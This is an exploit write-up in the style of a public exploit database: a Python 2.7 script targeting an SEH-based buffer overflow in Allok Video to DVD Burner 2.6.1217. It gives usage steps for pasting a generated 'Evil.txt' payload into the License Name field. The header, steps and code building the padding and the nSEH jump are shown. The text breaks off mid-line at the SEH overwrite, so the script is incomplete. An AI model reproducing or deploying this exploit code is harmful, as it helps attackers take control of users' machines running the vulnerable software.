####################################################### # Exploit Title: Buffer Overflow(SEH) on Allok Video to DVD Burner2.6.1217 # Date: 23.04.2018 # Exploit Author:T3jv1l # Vendor Homepage:http://www.alloksoft.com/ # Software: www.alloksoft.com/allok_dvdburner.exe # Category:Local # Contact:https://twitter.com/T3jv1l # Version: Allok Video to DVD Burner 2.6.1217 # Tested on: Windows 7 SP1 x86 # Hello subinacls ! # Method Corelan Coder : https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/ ############################################################# print""" #1. Download and install the setup file #2. Run this exploit code via python 2.7 #3. A file "Evil.txt" will be created #4. Copy the contents of the file (Evil.txt)and paste in the License Name field #5. Click Register and BOMM !!!! """ import struct file = open("Evil.txt","wb") buffer = 4000 junk = "A" * 780 nseh = "\x90\x90\xeb\x10" seh = struct.pack("